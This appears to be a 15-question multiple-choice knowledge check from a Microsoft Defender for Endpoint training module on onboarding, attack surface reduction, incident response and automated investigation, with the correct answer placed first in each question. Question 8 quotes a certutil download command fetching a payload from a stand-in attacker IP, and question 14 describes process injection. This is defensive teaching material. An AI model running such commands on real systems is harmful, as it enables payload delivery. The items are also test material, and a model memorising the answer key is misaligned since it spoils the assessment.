2.10 Check My Knowledge

10-14 hours · Module 2

Check My Knowledge

Module 2 — Check My Knowledge (15 questions)

1. Your organization has M365 E3 licenses. A SOC analyst opens an endpoint alert and wants to use live response to collect a suspicious file from the device. The option is greyed out. What is the problem?

M365 E3 includes Defender for Endpoint Plan 1, which does not include live response. Live response requires Plan 2 (included in M365 E5 or available as a standalone add-on). Plan 1 provides prevention and basic response actions (isolate, scan) but not the investigation features: device timeline, live response, Advanced Hunting, and automated investigation.
Live response needs to be enabled in Advanced features settings
The device is offline and cannot accept a live response session
The analyst does not have the Security Reader role

2. You need to onboard 50 Windows Server 2012 R2 servers to MDE. You download the onboarding script and run it on the first server, but the sensor service does not start. What did you miss?

Windows Server 2012 R2 requires the unified solution MSI package to be installed before running the onboarding script. The MDE sensor is not built into Server 2012 R2 (unlike Server 2019+). The correct sequence is: install the unified solution package first, then run the onboarding script. Without the unified solution, the onboarding script has no sensor service to configure.
Server 2012 R2 is not supported by MDE
You need to reboot the server after running the script
The server needs .NET Framework 4.8 or later

3. A device was onboarded 4 hours ago but does not appear in the portal. The onboarding script completed without errors. What is your first troubleshooting step?

Run the MDE client analyzer tool to test connectivity to the cloud service endpoints. Ninety percent of onboarding failures are caused by network connectivity issues — firewalls, proxies, or SSL inspection blocking the required Microsoft URLs. The analyzer identifies the specific endpoint that is blocked and the failure reason, directing you to the exact network configuration change needed.
Reboot the device and wait another 4 hours
Reinstall the operating system and re-onboard
Check whether the device has an E5 license assigned

4. You deploy all ASR rules in block mode on Monday. On Tuesday, the finance team reports that their automated Excel reporting macro no longer generates reports. What went wrong and what is the correct fix?

The "Block Office applications from creating child processes" rule is blocking the macro from launching the child process that generates the report (likely PowerShell or cmd.exe). The fix: revert this specific rule to audit mode for the finance device group, create a per-rule exclusion for the specific reporting script path, verify the exclusion works in audit mode, then re-enable block mode with the exclusion. The root cause is skipping the audit phase — 30 days in audit mode would have identified this false positive before it disrupted operations.
Disable all ASR rules — they are not compatible with macros
Add the entire C:\Users\Finance folder to the global exclusion list
Tell finance to rewrite the macro without child processes

5. ASR blocks a Word document from spawning cmd.exe on a user's workstation. The block was successful — no malware executed. Is the investigation complete?

No. The block prevented execution on this device, but you still need to investigate: where did the malicious document come from (email, file share, USB)? Who else received it? Did the same document reach devices where ASR is in audit mode or disabled? Does the attack pattern indicate a targeted campaign? ASR stopped the immediate threat — the investigation determines the scope and prevents recurrence across the organization.
Yes — the attack was blocked, no harm done, close the alert
Only if the user reports being phished separately
Only investigate if the document was an email attachment

6. Your organization uses CrowdStrike as the primary antivirus. MDE is deployed for EDR telemetry and investigation capabilities. Microsoft Defender Antivirus is in passive mode. A new malware variant bypasses CrowdStrike. Which MDE configuration provides a safety net?

EDR in block mode. When Defender Antivirus is passive, EDR in block mode allows the EDR behavioral engine to block malicious artifacts it detects — even though Defender Antivirus is not actively protecting. This acts as a secondary defense layer: if the primary antivirus misses a threat, MDE's behavioral analysis can still block it in real time.
Cloud-delivered protection — it updates faster than CrowdStrike
Custom detection rules that run every hour
Tamper protection to prevent CrowdStrike from disabling Defender

7. During an incident, you identify an attacker C2 server at IP 203.0.113.47. You need to block all endpoint communication with this IP immediately, including for employees working remotely from home. What do you configure?

Create an IP indicator in Settings → Endpoints → Indicators with the action "Alert and block." MDE indicators enforce blocking at the endpoint level regardless of the device's network location. Unlike a corporate firewall block (which only protects devices on the corporate network), MDE indicators travel with the device and block the IP on any network — office, home, hotel, coffee shop.
Add a firewall rule to block the IP at the network perimeter
Create a custom detection rule that alerts on connections to the IP
Isolate all devices that previously connected to the IP

8. The device timeline shows certutil.exe running with the flags -urlcache -split -f http://203.0.113.47/payload.exe. The parent process is powershell.exe. What is happening?

The attacker is using certutil.exe (a legitimate Windows certificate utility) as a living-off-the-land binary (LOLBin) to download a payload from their C2 server. The -urlcache -split -f flags abuse certutil's cache functionality as a file downloader. This technique is popular because certutil is a signed Microsoft binary that many security tools trust by default. The parent process (PowerShell) likely came from an earlier stage in the attack chain. Actions: block the C2 IP, quarantine the downloaded file, investigate what happened after the payload was written to disk.
Certutil is performing a routine certificate update from Microsoft
The user is manually downloading a certificate for a web server
PowerShell is updating its certificate store

9. Investigation confirms a workstation is compromised with active C2 communication. What is the correct response action sequence?

Collect investigation package → isolate the device → contain the user → restrict app execution. Collection captures live network state before isolation terminates it. Isolation stops C2 and lateral movement. Containing the user prevents compromised credentials from being used on other devices. App restriction prevents dormant payloads from executing during investigation.
Isolate immediately, then collect the investigation package
Run an antivirus scan first, then isolate if malware is found
Ask the user to disconnect from the network and bring the device to IT

10. A compromised network printer is being used as a pivot point for lateral movement. It cannot run the MDE sensor. How do you contain it?

Use the "Contain device" action in the Defender portal. This instructs every onboarded device to block all communication with the printer's IP and MAC address. The printer becomes effectively quarantined from all managed endpoints. For complete containment, also coordinate with the network team to shut down the printer's switch port, since unmanaged devices on the same network segment can still reach it.
Isolate it using the device page
MDE cannot respond to devices without the sensor installed
Create a firewall rule to block the printer's IP

11. Your organization just deployed MDE with AIR. The SOC team has no prior experience with automated investigation. What automation level should you configure, and why?

Semi — require approval for any remediation. This gives the team AIR's investigation benefits (immediate automated analysis of every alert) while requiring human approval for all remediation actions. Over 30-60 days, the team reviews AIR's recommendations, builds confidence in its accuracy, and identifies environment-specific false positive patterns. After this learning period, device groups with consistently high approval rates (95%+) can be upgraded to full automation.
Full automation from day one for maximum protection
No automated response — manual investigation only until the team is trained
Full for workstations, no automation for everything else

12. The Action Center shows 12 pending remediation actions that have been waiting for 5 days. What operational problem does this indicate?

The SOC is not reviewing pending actions as part of the shift routine. Each pending action represents an identified threat that AIR analyzed and recommended remediation for — but no analyst approved it. For 5 days, those threats have remained active. This is a process failure: the shift-start routine should include clearing all pending actions. If the team consistently cannot keep up, the device groups should be upgraded to full automation for action types that are always approved.
AIR is generating false positives that should be ignored
12 pending actions over 5 days is normal volume
The pending actions will auto-approve after 7 days

13. TVM shows 200 critical CVEs across your device fleet. You can patch 20 this week. How do you prioritize?

Use TVM's recommendations page, which ranks by combined impact: CVEs with publicly available exploit code affecting devices with high exposure levels (internet-facing, holding sensitive data, or part of attack paths to critical assets). A CVE with CVSS 7.0 and a Metasploit module targeting your internet-facing Exchange server is higher priority than a CVSS 9.8 CVE that requires local physical access to an air-gapped workstation. TVM pre-computes this prioritization — start from the top.
Patch the 20 with the highest CVSS scores
Patch the oldest CVEs first — they have been exposed the longest
Patch workstations first because they have the most vulnerabilities

14. The device timeline shows rundll32.exe opening explorer.exe using CreateRemoteThreadApiCall, followed by explorer.exe making outbound HTTPS connections to an IP address it has never connected to before. What happened?

Process injection. rundll32.exe injected code into explorer.exe by creating a remote thread in its memory space. The injected code (now running inside the trusted explorer.exe process) is establishing C2 communication to the external IP. The attacker chose explorer.exe because it is always running, is trusted by security tools, and its network activity might not be flagged because Explorer occasionally makes legitimate web connections. Investigate the external IP, check for additional injected processes, and trace back to what launched rundll32.exe to find the initial access vector.
Normal Windows behavior — Explorer regularly connects to external services
DLL sideloading — rundll32 loaded a malicious DLL from explorer's directory
A Windows update is being downloaded through the Explorer process

15. Attack disruption automatically isolates the CFO's workstation and disables the CFO's account during a detected ransomware attack. The CFO's assistant demands immediate restoration. What do you do?

Review the attack disruption evidence in the incident timeline before making any changes. Attack disruption triggers at a high confidence threshold with cross-product signal correlation. If the evidence supports the ransomware classification (encryption behavior detected, suspicious process chain, C2 communication), the disruption was correct and the device must remain isolated until remediation is complete. Explain that the automated containment prevented potential data loss. If the evidence is weak and the disruption appears to be a false positive (extremely rare), reverse the actions after documenting your reasoning and obtaining approval from your incident commander.
Restore access immediately — executive productivity takes priority
Disable attack disruption to prevent future false positives
Escalate to the CISO and do nothing until they decide